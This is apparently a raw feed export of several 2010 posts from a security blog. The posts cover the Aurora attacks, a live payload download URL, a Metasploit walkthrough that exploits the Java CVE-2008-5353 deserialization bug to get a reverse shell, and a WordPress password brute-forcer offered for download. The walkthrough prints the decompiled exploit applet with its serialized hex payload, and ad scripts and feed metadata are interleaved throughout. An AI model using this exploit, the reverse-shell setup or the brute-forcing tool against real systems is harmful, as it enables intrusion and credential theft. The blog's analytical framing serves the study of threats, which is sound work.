</div><div class="separator" style="clear: both; text-align: center;"> <a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjWlobv_qfHY62tRlXZbZcpg4lQj1SKnfWNClQf6qIMGQImR5ywgDrM2EgtCcpNnFcsTi4XP2oOYgIA35Pb_Odh6s-TtiDlGuYpZoVFM2iqvRMYOvvzEBBlB9yhCJP__6Wq61r3eLWZ_R5k/s1600-h/decryption_02.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjWlobv_qfHY62tRlXZbZcpg4lQj1SKnfWNClQf6qIMGQImR5ywgDrM2EgtCcpNnFcsTi4XP2oOYgIA35Pb_Odh6s-TtiDlGuYpZoVFM2iqvRMYOvvzEBBlB9yhCJP__6Wq61r3eLWZ_R5k/s400/decryption_02.jpg" /></a><br />
</div><br />
Obviously, the shellcode payload will download additional file from this URL: http://demo1.ftpaccess.cc/demo/ad.jpg and perform further malicious activities.<br />
<br />
<b><span style="font-size: large;">R</span>eference</b><br />
<br />
[1] <a href="http://wepawet.iseclab.org/view.php?hash=1aea206aa64ebeabb07237f1e2230d0f&type=js">http://wepawet.iseclab.org/view.php?hash=1aea206aa64ebeabb07237f1e2230d0f&type=js</a> <i>-- Wepawet analysis</i><br />
[2]<a href="http://www.metasploit.com/redmine/projects/framework/repository/revisions/8136/entry/modules/exploits/windows/browser/ie_aurora.rb"> http://www.metasploit.com/redmine/projects/framework/repository/revisions/8136/entry/modules/exploits/windows/browser/ie_aurora.rb</a> <i>-- ie_aurora.rb Metasploit Aurora Exploit Module </i><br />
<script type="text/javascript">
</script><br />
<script type="text/javascript">
Internet Explorer 6 mshtml.dll Remote Code Execution<!--
google_ad_client = "pub-9154929752124078";
/* x9090.blogspot.com */
google_ad_slot = "4738578270";
google_ad_width = 728;
google_ad_height = 90;
//-->
</script><script src="http://pagead2.googlesyndication.com/pagead/show_ads.js" type="text/javascript">
</script>x9090http://www.blogger.com/profile/07253863514381068976noreply@blogger.com4tag:blogger.com,1999:blog-1022731470813881575.post-10994919990879992132010-01-15T20:16:00.003+08:002010-01-17T13:20:43.067+08:00[News] Yet Another PDF & IE Attack<b><span style="font-size: large;">Y<span style="font-size: small;">et <span style="font-size: large;">A<span style="font-size: small;">nother <span style="font-size: large;">P</span>DF & <span style="font-size: large;">I</span>E <span style="font-size: large;">A</span>ttack</span></span></span></span></b><br />
<br />
If you do not know the recent Google attacks from Chinese people, you might want to visit F-Secure blog, <a href="http://www.f-secure.com/weblog/archives/00001854.html">http://www.f-secure.com/weblog/archives/00001854.html</a>. As an abstract from F-Secure blog This is known to be another targeted attack from the cybercriminals to gain intellectual propery that is sensitive information in common from the China activist.<br />
<br />
This attack is belived to be driven from the exploit of 0-day vulnerability for various well-known application like <a href="http://www.wired.com/threatlevel/2010/01/google-hack-attack/">Adobe Acrobat/Reader</a> and <a href="http://siblog.mcafee.com/cto/operation-%E2%80%9Caurora%E2%80%9D-hit-google-others/">Internet Explorer 6, 7 and 8</a> and etc. The exploit will drop a DLL component which will be installed as a service and open the backdoor for the remote computer to fully compromise the infected machines. The description for this backdoor can be found from<a href="http://www.f-secure.com/v-descs/trojan_w32_agent_kog.shtml"> F-Secure description page</a> or <a href="http://blog.threatexpert.com/2010/01/trojanhydraq-exposed.html">Symantec's Trojan.Hydraq</a>.<br />
<br />
SANS also provides an analysis for the PDF exploit which they call it "<a href="http://isc.sans.org/diary.html?n&storyid=7984">PDF Babushka</a>". As a result of this attack, Google has announced to quit censoring google.cn, more information can be found from <a href="http://googleblog.blogspot.com/2010/01/new-approach-to-china.html">Official Google Blog: A new approach to China</a><br />
<br />
<b>Update (17/01/2010)</b><br />
<br />
Wepawet was fist released the exploit code that is one of the attack vectors for the Google targeted attack. The exploit only affect IE 6 which has no DEP (Data Execution Prevention) enabled unlike IE 7 on Windows XP SP3 and IE 8.<br />
<br />
Needless to say, the IE 6 contains lots of pontential 0 day vulnerabilites which has yet to be discovered. For Google targeted attacks, there should probably has other 0 day vulnerabilites for IE 7 and IE 8 which have not yet been revealed yet.<br />
<b> </b> <br />
<b> </b><br />
<b><span style="font-size: large;">R</span>eference</b><br />
<br />
[1] <a href="http://isc.sans.org/diary.html?n&storyid=8002">http://isc.sans.org/diary.html?n&storyid=8002</a> -- <i>Exploit code available for CVE-2010-0249</i><b> </b><br />
[2] <a href="http://wepawet.iseclab.org/view.php?hash=1aea206aa64ebeabb07237f1e2230d0f&type=js">http://wepawet.iseclab.org/view.php?hash=1aea206aa64ebeabb07237f1e2230d0f&type=js</a> -- <i>Exploit CVE-2010-0249 Source Code</i><br />
[3] <a href="http://www.metasploit.com/redmine/projects/framework/repository/revisions/8136/entry/modules/exploits/windows/browser/ie_aurora.rb">http://www.metasploit.com/redmine/projects/framework/repository/revisions/8136/entry/modules/exploits/windows/browser/ie_aurora.rb</a> -- <i>Metasploit "Aurora" Module</i><br />
<i> </i><br />
<i> </i><br />
~Signing off<br />
@x9090<br />
<br />
<br />
<br />
<br />
<script type="text/javascript">
<!--
google_ad_client = "pub-9154929752124078";
/* x9090.blogspot.com */
google_ad_slot = "4738578270";
google_ad_width = 728;
google_ad_height = 90;
//-->
</script><br />
<script src="http://pagead2.googlesyndication.com/pagead/show_ads.js" type="text/javascript">
</script>x9090http://www.blogger.com/profile/07253863514381068976noreply@blogger.com2tag:blogger.com,1999:blog-1022731470813881575.post-50951062012376536622010-01-09T13:23:00.009+08:002010-06-27T17:54:06.508+08:00CVE-2008-5353 - Old Java Exploit In the Wild<script type="text/javascript">
aT<!--
google_ad_client = "pub-9154929752124078";
/* x9090.blogspot.com */
google_ad_slot = "4738578270";
google_ad_width = 728;
google_ad_height = 90;
//-->
</script><b><span style="font-size: large;">J<span style="font-size: small;">ava <span style="font-size: large;">C</span>alendar <span style="font-size: large;">D</span>eserialize <span style="font-size: large;">E</span>xploit <span style="font-size: large;"><span style="font-size: small;">I</span></span>n <span style="font-size: large;">T</span>he <span style="font-size: large;">W</span>ild - CVE-2008-5353</span></span></b> <br />
<br />
This is my first post in 2010. Hurray &(^_^)&<br />
Of course this is not the good news as there is Java exploit in the wild which is kinda out of date. The vulnerability has been documented as <a href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-5353">CVE-2008-5353</a>.<br />
<br />
The exploit utilizes java applet exploiting <a href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-5353">CVE-2008-5353</a>. It is not hard to find the PoC (or real exploit) in the Internet as this exists quite some time. Since <a href="http://www.metasploit.com/modules/exploit/multi/browser/java_calendar_deserialize">Metasploit </a>already include the the PoC in the Framework, I will demonstrate the PoC:<br />
<br />
<ol><li>Select the exploit <b>mutli/browser/java_calendar_deserialize</b> </li>
<div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjg_XPOOLuu8uP_bQUbKCIooXX5SIrx2-gTEpEQRqnV4-nez0bJcNeO27f2W7LnMppWD-ns_3MnmMb5F43ALwKQpzSPBBbS8lGZ3mwIQ6rofRWGgH2sF-jZeys04bw1P1A7lPDuA0O1CFi-/s1600-h/msf_1.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjg_XPOOLuu8uP_bQUbKCIooXX5SIrx2-gTEpEQRqnV4-nez0bJcNeO27f2W7LnMppWD-ns_3MnmMb5F43ALwKQpzSPBBbS8lGZ3mwIQ6rofRWGgH2sF-jZeys04bw1P1A7lPDuA0O1CFi-/s320/msf_1.jpg" /></a> </div>
<li>Set the payload <b>generic/shell_reverse_tcp</b> <color=red>NOTE: <b>generic/shell_bind_tcp</b> does not work in this case</color=red><br />
<br />
<br />
<div style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhfso1F-V7I35en8ee1JpwF8Zy6uvd3_qi_wsJji_u_zaXcy_ZlIMj1kvrgtY3HpODkQaWLfthoEfLtN_WfUOSOAG2_Ih9XMdQ5zwIAHH_1SUCtyMEhRgthl6YezgZW_fKjuiY6garthn-S/s1600-h/msf_2.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhfso1F-V7I35en8ee1JpwF8Zy6uvd3_qi_wsJji_u_zaXcy_ZlIMj1kvrgtY3HpODkQaWLfthoEfLtN_WfUOSOAG2_Ih9XMdQ5zwIAHH_1SUCtyMEhRgthl6YezgZW_fKjuiY6garthn-S/s320/msf_2.jpg" /></a></div> <br />
<br />
</li>
<li>Set the options. <b>URIPATH</b> can be any promising path name ;) <b>LHOST</b> is attacker's server address:</li>
<div class="separator" style="clear: both; text-align: center;"> <a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEixKyAKMHIJZDNR6cgO39PSPhRfBwXsgL0BZ7vZLEeSfrQbsXlOa7Rae0cNZ6elFNXPkP-TeeYF1iZypLkTI9EIlwd7CMSyDfsSkBvIkCRHlDtdQouj_MqwM0YQRMJ6Y0lPniikLwWb3hVT/s1600-h/msf_3.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEixKyAKMHIJZDNR6cgO39PSPhRfBwXsgL0BZ7vZLEeSfrQbsXlOa7Rae0cNZ6elFNXPkP-TeeYF1iZypLkTI9EIlwd7CMSyDfsSkBvIkCRHlDtdQouj_MqwM0YQRMJ6Y0lPniikLwWb3hVT/s320/msf_3.jpg" /></a> </div>
<li>Recheck the options:</li>
<div style="text-align: center;"><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiFtH07lX5PJo97pi1oa_YH7fwMBpc5eEXeYNrB4D4RnuwcEiGDRXU98f8sa3cOcss7xzIbtqZJCYOmHMpsufWSizlz6vrIapgeSkiYNg26p5Ng9iamiMTMGg096z654yCeWq6ZbrW4Uf7R/s1600-h/msf_4.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiFtH07lX5PJo97pi1oa_YH7fwMBpc5eEXeYNrB4D4RnuwcEiGDRXU98f8sa3cOcss7xzIbtqZJCYOmHMpsufWSizlz6vrIapgeSkiYNg26p5Ng9iamiMTMGg096z654yCeWq6ZbrW4Uf7R/s320/msf_4.jpg" /></a> </div></div>
<li>Execute the exploit:</li>
<div style="text-align: center;"><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgnR560FwZr1zC1JkhAv9O5ajk5lPX3pVE2tpjnSf2NCcp0WKS_sdwNm8M90OIai4gqtlmIbJYNLYjNJ9FyYSIxA5I_HdqzzRaxJDd2x5QD6ZOJLgrk2MD7RQpPIs29xTG5Gq01shP85fCW/s1600-h/msf_5.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgnR560FwZr1zC1JkhAv9O5ajk5lPX3pVE2tpjnSf2NCcp0WKS_sdwNm8M90OIai4gqtlmIbJYNLYjNJ9FyYSIxA5I_HdqzzRaxJDd2x5QD6ZOJLgrk2MD7RQpPIs29xTG5Gq01shP85fCW/s320/msf_5.jpg" /></a> </div></div>
<li>From the remote computer <b>192.168.0.108</b>, visit the URL <b>http://192.168.0.108/sexy_bridtney</b> and see the result:</li>
<div style="text-align: center;"><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgUQY7shyFQy3ThKByUYgH42lX4wKuF8vJCV0T8BCFF6ewSjfW9Uqrg1AhjP58dmED-9nJHgqlsgbhI5jSnI-rriZB9UHD9Gp7uqtPY_BgLY19ktIZ2aswFj_fU4cg6FGvDSK-29BwrLVaJ/s1600-h/victim_computer.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgUQY7shyFQy3ThKByUYgH42lX4wKuF8vJCV0T8BCFF6ewSjfW9Uqrg1AhjP58dmED-9nJHgqlsgbhI5jSnI-rriZB9UHD9Gp7uqtPY_BgLY19ktIZ2aswFj_fU4cg6FGvDSK-29BwrLVaJ/s320/victim_computer.jpg" /></a> <a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjCn7fVLgzm19kbROh2roisC5v9YfupdFrBJEaqyo9KICVX4R7sAVHvAZMEd-WlHt475ThMDT5dLrDpbgs8OG54tuSQg0iDQ_1I6gibDDPKxztXS3CD3YB3oo4dir5MxFY7bzqvs88-oL2r/s1600-h/msf_6.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjCn7fVLgzm19kbROh2roisC5v9YfupdFrBJEaqyo9KICVX4R7sAVHvAZMEd-WlHt475ThMDT5dLrDpbgs8OG54tuSQg0iDQ_1I6gibDDPKxztXS3CD3YB3oo4dir5MxFY7bzqvs88-oL2r/s320/msf_6.jpg" /></a> </div></div>
<li>0wning... :)</li>
<div style="text-align: center;">
<div class="separator" style="clear: both; text-align: center;"></div></div><div class="separator" style="clear: both; text-align: center;"> <a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi4eM1pxLuGUguQIG_nT4h7widZ9vig-wn-sacUdDJ6SAZ7wT-t9oGQbATb4Up5Ky2vwFYa7Rf8J-bc76FrWUPGyJNY_Luwhig4QO-VIGjADOojiyuLoDEMK49ZThZw_q1jRQC95fieWILL/s1600-h/msf_7.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi4eM1pxLuGUguQIG_nT4h7widZ9vig-wn-sacUdDJ6SAZ7wT-t9oGQbATb4Up5Ky2vwFYa7Rf8J-bc76FrWUPGyJNY_Luwhig4QO-VIGjADOojiyuLoDEMK49ZThZw_q1jRQC95fieWILL/s320/msf_7.jpg" /></a> </div><div class="separator" style="clear: both; text-align: center;"></div><div class="separator" style="clear: both; text-align: center;"> <a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiJsJtIZ67ctzmGPfKD6Pj8libJcBbG5HneCGZVhpv4fhyphenhyphenD1zv7NAON8yFNoFXAm8Fnp_2Grbu6id4aJjs4LLlVz7Vv9z2_ps_WVVKtV6wr1srcVZEFDNaLBrHkLCFZSxYw1O59FtqkA-Fo/s1600-h/0w3ned.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiJsJtIZ67ctzmGPfKD6Pj8libJcBbG5HneCGZVhpv4fhyphenhyphenD1zv7NAON8yFNoFXAm8Fnp_2Grbu6id4aJjs4LLlVz7Vv9z2_ps_WVVKtV6wr1srcVZEFDNaLBrHkLCFZSxYw1O59FtqkA-Fo/s320/0w3ned.jpg" /></a> </div> </ol><br />
A quick glance of the exploit apple. This is actuallly the exploit code from Metasploit <b>Applet.jar</b>:<br />
<br />
<blockquote><span style="font-family: "Courier New",Courier,monospace;">// Decompiled by Jad v1.5.8g. Copyright 2001 Pavel Kouznetsov.</span><br />
<span style="font-family: "Courier New",Courier,monospace;">// Jad home page: http://www.kpdus.com/jad.html</span><br />
<span style="font-family: "Courier New",Courier,monospace;">// Decompiler options: packimports(3) </span><br />
<span style="font-family: "Courier New",Courier,monospace;">// Source File Name: AppletX.java</span><br />
<br />
<span style="font-family: "Courier New",Courier,monospace;">package msf.x;</span><br />
<br />
<span style="font-family: "Courier New",Courier,monospace;">import java.applet.Applet;</span><br />
<span style="font-family: "Courier New",Courier,monospace;">import java.io.ByteArrayInputStream;</span><br />
<span style="font-family: "Courier New",Courier,monospace;">import java.io.ObjectInputStream;</span><br />
<br />
<span style="font-family: "Courier New",Courier,monospace;">// Referenced classes of package msf.x:</span><br />
<span style="font-family: "Courier New",Courier,monospace;">// PayloadX, LoaderX</span><br />
<br />
<span style="font-family: "Courier New",Courier,monospace;">public class AppletX extends Applet</span><br />
<span style="font-family: "Courier New",Courier,monospace;">{</span><br />
<br />
<span style="font-family: "Courier New",Courier,monospace;"> public AppletX()</span><br />
<span style="font-family: "Courier New",Courier,monospace;"> {</span><br />
<span style="font-family: "Courier New",Courier,monospace;"> }</span><br />
<br />
<span style="font-family: "Courier New",Courier,monospace;"> public void init()</span><br />
<span style="font-family: "Courier New",Courier,monospace;"> {</span><br />
<span style="font-family: "Courier New",Courier,monospace;"> try</span><br />
<span style="font-family: "Courier New",Courier,monospace;"> {</span><br />
<span style="font-family: "Courier New",Courier,monospace;"> ObjectInputStream oin = new <b><span style="color: yellow;">ObjectInputStream(new ByteArrayInputStream(PayloadX.StringToBytes("ACED00057372001 B6A6176612E7574696C2E477265676F7269616E43616C656E6461728F3DD7 D6E5B0D0C10200014A0010677265676F7269616E4375746F7665727872001 26A6176612E7574696C2E43616C656E646172E6EA4D1EC8DC5B8E03000B5 A000C6172654669656C647353657449000E66697273744461794F665765656 B5A0009697354696D655365745A00076C656E69656E744900166D696E696D6 16C44617973496E46697273745765656B4900096E6578745374616D7049001 573657269616C56657273696F6E4F6E53747265616D4A000474696D655B000 66669656C64737400025B495B000569735365747400025B5A4C00047A6F6E6 57400144C6A6176612F7574696C2F54696D655A6F6E653B787001000000010 10100000001000000020000000100000121563AFC0E757200025B494DBA602 676EAB2A502000078700000001100000001000007D90000000400000015000 00004000000120000008A00000002000000030000000100000004000000100 000001100000022000002DEFE488C0000000000757200025B5A578F203914B 85DE2020000787000000011010101010101010101010101010101010173720 0186A6176612E7574696C2E53696D706C6554696D655A6F6E65FA675D60D15 EF5A603001249000A647374536176696E6773490006656E6444617949000C6 56E644461794F665765656B490007656E644D6F6465490008656E644D6F6E7 468490007656E6454696D6549000B656E6454696D654D6F646549000972617 74F666673657449001573657269616C56657273696F6E4F6E53747265616D4 90008737461727444617949000E73746172744461794F665765656B4900097 3746172744D6F646549000A73746172744D6F6E74684900097374617274546 96D6549000D737461727454696D654D6F64654900097374617274596561725 A000B7573654461796C696768745B000B6D6F6E74684C656E6774687400025 B42787200126A6176612E7574696C2E54696D655A6F6E6531B3E9F57744ACA 10200014C000249447400124C6A6176612F6C616E672F537472696E673B787 074000E416D65726963612F446177736F6E0036EE800000000000000000000 00000000000000000000000000000FE488C000000000200000000000000000 00000000000000000000000000000000000000000757200025B42ACF317F80 60854E002000078700000000C1F1C1F1E1F1E1F1F1E1F1E1F770A000000060 000000000007571007E0006000000020000000000000000787372000D6D736 62E782E4C6F61646572585E8B4C67DDC409D8020000787078FFFFF4E2F964AC000A")));</span></b></span><b><span style="color: yellow;"><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> Object deserializedObject = oin.readObject();</span></span></b><br />
<span style="font-family: "Courier New",Courier,monospace;"> if(deserializedObject != null && LoaderX.instance != null)</span><br />
<span style="font-family: "Courier New",Courier,monospace;"> {</span><br />
<span style="font-family: "Courier New",Courier,monospace;"> String data = getParameter("data");</span><br />
<span style="font-family: "Courier New",Courier,monospace;"> String lhost = getParameter("lhost");</span><br />
<span style="font-family: "Courier New",Courier,monospace;"> String lport = getParameter("lport");</span><br />
<span style="font-family: "Courier New",Courier,monospace;"> if(data == null)</span><br />
<span style="font-family: "Courier New",Courier,monospace;"> data = "";</span><br />
<span style="font-family: "Courier New",Courier,monospace;"> LoaderX.instance.bootstrapPayload(data, lhost, lport != null ? Integer.parseInt(lport) : 4444);</span><br />
<span style="font-family: "Courier New",Courier,monospace;"> }</span><br />
<span style="font-family: "Courier New",Courier,monospace;"> }</span><br />
<span style="font-family: "Courier New",Courier,monospace;"> catch(Exception exception) { }</span><br />
<span style="font-family: "Courier New",Courier,monospace;"> }</span><br />
<br />
<span style="font-family: "Courier New",Courier,monospace;"> private static final long serialVersionUID = 0xd30f41af207ff1c8L;</span><br />
<span style="font-family: "Courier New",Courier,monospace;"> private static final String serializedObject = <b style="color: yellow;">"ACED00057372001B6A6176612E7574696C2E477265676F7269616E43616C6 56E6461728F3DD7D6E5B0D0C10200014A0010677265676F7269616E4375746 F766572787200126A6176612E7574696C2E43616C656E646172E6EA4D1EC8D C5B8E03000B5A000C6172654669656C647353657449000E666972737444617 94F665765656B5A0009697354696D655365745A00076C656E69656E7449001 66D696E696D616C44617973496E46697273745765656B4900096E657874537 4616D7049001573657269616C56657273696F6E4F6E53747265616D4A00047 4696D655B00066669656C64737400025B495B000569735365747400025B5A4 C00047A6F6E657400144C6A6176612F7574696C2F54696D655A6F6E653B787 00100000001010100000001000000020000000100000121563AFC0E757200 025B494DBA602676EAB2A502000078700000001100000001000007D9000000 040000001500000004000000120000008A0000000200000003000000010000 0004000000100000001100000022000002DEFE488C0000000000757200025B 5A578F203914B85DE202000078700000001101010101010101010101010101 01010101737200186A6176612E7574696C2E53696D706C6554696D655A6F6E 65FA675D60D15EF5A603001249000A647374536176696E6773490006656E6 444617949000C656E644461794F665765656B490007656E644D6F646549000 8656E644D6F6E7468490007656E6454696D6549000B656E6454696D654D6F6 4654900097261774F666673657449001573657269616C56657273696F6E4F6 E53747265616D490008737461727444617949000E73746172744461794F665 765656B49000973746172744D6F646549000A73746172744D6F6E746849000 9737461727454696D6549000D737461727454696D654D6F646549000973746 17274596561725A000B7573654461796C696768745B000B6D6F6E74684C656 E6774687400025B42787200126A6176612E7574696C2E54696D655A6F6E653 1B3E9F57744ACA10200014C000249447400124C6A6176612F6C616E672F537 472696E673B787074000E416D65726963612F446177736F6E0036EE8000000 0000000000000000000000000000000000000000000FE488C0000000002000 00000000000000000000000000000000000000000000000000000007572000 25B42ACF317F8060854E002000078700000000C1F1C1F1E1F1E1F1F1E1F1E1 F770A000000060000000000007571007E00060000000200000000000000007 87372000D6D73662E782E4C6F61646572585E8B4C67DDC409D802000078707 8FFFFF4E2F964AC000A"</b><span style="color: yellow;">;</span></span><br />
<span style="font-family: "Courier New",Courier,monospace;"> public static String data = null;</span><br />
<br />
<span style="font-family: "Courier New",Courier,monospace;">}</span><br />
<br />
</blockquote>The highlighted part is the hex data that contains the vulnerability that trigger the exploit and it will be converted to bytecode by java emulator. More information can read the <b>Reference </b>section.<br />
<br />
<br />
<b><span style="font-size: small;"><span style="font-size: large;">R</span>eference</span></b><br />
<br />
[1] <a href="http://slightlyrandombrokenthoughts.blogspot.com/2008/12/calendar-bug.html">http://slightlyrandombrokenthoughts.blogspot.com/2008/12/calendar-bug.html</a> -- <i>Calendar Bug</i><br />
[2] <a href="http://www.metasploit.com/modules/exploit/multi/browser/java_calendar_deserialize">http://www.metasploit.com/modules/exploit/multi/browser/java_calendar_deserialize</a> -- <i>Metasploit Module Browser - mutli/browser/java_calendar_deserialize</i><br />
[3] <a href="http://isc.sans.org/diary.html?n&storyid=7879">http://isc.sans.org/diary.html?n&storyid=7879</a> -- <i>Report of Java Object Serialization exploit in use in web drive-by attacks</i><br />
<br />
<script src="http://pagead2.googlesyndication.com/pagead/show_ads.js" type="text/javascript">
</script>x9090http://www.blogger.com/profile/07253863514381068976noreply@blogger.com0tag:blogger.com,1999:blog-1022731470813881575.post-28973345889856316252009-12-18T22:30:00.018+08:002009-12-31T12:48:14.534+08:00Tool - Wordpress Bruteforcer (WP_BruteForcer.exe)<span style="font-size:130%;">Wordpress Brute Force Tool</span><br /><br />Hoho, the chritmas is around the corner and here is my christmas gift that would like to share with others. This is a brute forcing tool that targets the Wordpress web application.<br /><br />Here is the demo on how to use the tool to break Wordpress password:<br /><br /><br /><div style="text-align: center;"><a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgjBFThq1j5ICJgrsSkSow2pLiUQW3sMfsuhFnNWtIXmLegMjOHpXDQuQHf15ZGa11JZ8D8zO-JszOlxjrdyI2nlH7MDXfr6dnNifEVjvUYeV6LwASgCXSJC9cc0qkASSifFOH7vbOXE3i-/s1600-h/wp_bruteforcer_command.jpg"><img style="margin: 0px auto 10px; display: block; text-align: center; cursor: pointer; width: 400px; height: 159px;" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgjBFThq1j5ICJgrsSkSow2pLiUQW3sMfsuhFnNWtIXmLegMjOHpXDQuQHf15ZGa11JZ8D8zO-JszOlxjrdyI2nlH7MDXfr6dnNifEVjvUYeV6LwASgCXSJC9cc0qkASSifFOH7vbOXE3i-/s400/wp_bruteforcer_command.jpg" alt="" id="BLOGGER_PHOTO_ID_5416585359465597922" border="0" /></a><br />Figure 1: WP_BruteForcer Usage<br /><br /><div style="text-align: left;"><br /><div style="text-align: center;"><a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgR3UN_PZFsywRQUhF94X4iuY0gEiKZ9EkpJumc4QCGjj8KulzGbiChAPzAgGRCEVK0v5BhZTjjCJJo29LJ1CkRH685V73HJZ8WOvVnTFR98m0oQa4erWbJWiUMAP-fmDrwhexBqfY1LpXr/s1600-h/wp_bruteforcer_command_target.jpg"><img style="margin: 0px auto 10px; display: block; text-align: center; cursor: pointer; width: 355px; height: 400px;" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgR3UN_PZFsywRQUhF94X4iuY0gEiKZ9EkpJumc4QCGjj8KulzGbiChAPzAgGRCEVK0v5BhZTjjCJJo29LJ1CkRH685V73HJZ8WOvVnTFR98m0oQa4erWbJWiUMAP-fmDrwhexBqfY1LpXr/s400/wp_bruteforcer_command_target.jpg" alt="" id="BLOGGER_PHOTO_ID_5416589557080399026" border="0" /></a><br />Figure 2: Brute force the wordpress application<br /><br /></div></div></div><br /><a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEinz2aqmOcgv0zqkWLl2s2WrB8d59G0Ti5u_Yo_R8v8XOlo644NGyLdOIsISDncZFBQDfRdqph8puukKqTUDUmSANWZgi65mtr3c-1qF_Qbf_o11hLbsqdtUT-M9cQDGnhg4JIdTY_CP2ci/s1600-h/wp_bruteforcer_cracking_password.jpg"><img style="margin: 0px auto 10px; display: block; text-align: center; cursor: pointer; width: 359px; height: 400px;" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEinz2aqmOcgv0zqkWLl2s2WrB8d59G0Ti5u_Yo_R8v8XOlo644NGyLdOIsISDncZFBQDfRdqph8puukKqTUDUmSANWZgi65mtr3c-1qF_Qbf_o11hLbsqdtUT-M9cQDGnhg4JIdTY_CP2ci/s400/wp_bruteforcer_cracking_password.jpg" alt="" id="BLOGGER_PHOTO_ID_5416613021740250290" border="0" /></a><br /><div style="text-align: center;">Figure 3: Password cracking<br /><br /></div><br /><div style="text-align: center;"><a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiJlDpP7J2rt1b9uYg96VhQG2XZUidKqWilMFW7_Kcs4lUTB3S4587GSG6W9YQjMqQwcEuiDf5h9ZLUWRcYofbASKJpeSje-ezoJRqfLpehTjuciE9Z6T6DXK96F-rVUVg2X9rGHLd_JVYQ/s1600-h/target_website.jpg"><img style="margin: 0px auto 10px; display: block; text-align: center; cursor: pointer; width: 400px; height: 274px;" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiJlDpP7J2rt1b9uYg96VhQG2XZUidKqWilMFW7_Kcs4lUTB3S4587GSG6W9YQjMqQwcEuiDf5h9ZLUWRcYofbASKJpeSje-ezoJRqfLpehTjuciE9Z6T6DXK96F-rVUVg2X9rGHLd_JVYQ/s400/target_website.jpg" alt="" id="BLOGGER_PHOTO_ID_5416598703592436562" border="0" /></a><br />Figure 4: Target Website (Dummy one ;))<br /><br /><br /><a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjPOmePxo7wszPFeC349O5h-cnXjTCbU1nmLbI2xKSKDekJJ6SrkffC0GSJge5Rtj3O364yF9go_HWpNbwAf862EuFOp3lViw_Vl8Q9vhVIDXB2JvUhxsy0_01-WZ-MnKWAuXoXBe5jGCcp/s1600-h/target_website_02.jpg"><img style="margin: 0px auto 10px; display: block; text-align: center; cursor: pointer; width: 400px; height: 274px;" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjPOmePxo7wszPFeC349O5h-cnXjTCbU1nmLbI2xKSKDekJJ6SrkffC0GSJge5Rtj3O364yF9go_HWpNbwAf862EuFOp3lViw_Vl8Q9vhVIDXB2JvUhxsy0_01-WZ-MnKWAuXoXBe5jGCcp/s400/target_website_02.jpg" alt="" id="BLOGGER_PHOTO_ID_5416600544164911458" border="0" /></a><br />Figure 5: Ready to crack the website<br /><br /><br /><a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjLXFx0DJ-caK7Lk3whIAW7skxTrTlgRPjkDUrrcw96dK2n_3oIdjNDRI3yLt25wEyIBq-RCvIw6a4EkKlkqNKqbA3PGSbTI8D4QdeCU7Rp6SmPmSt-fWxi1VZEaFYls5kHrEM_FiZwZQQk/s1600-h/Owned!!.jpg"><img style="margin: 0px auto 10px; display: block; text-align: center; cursor: pointer; width: 400px; height: 274px;" 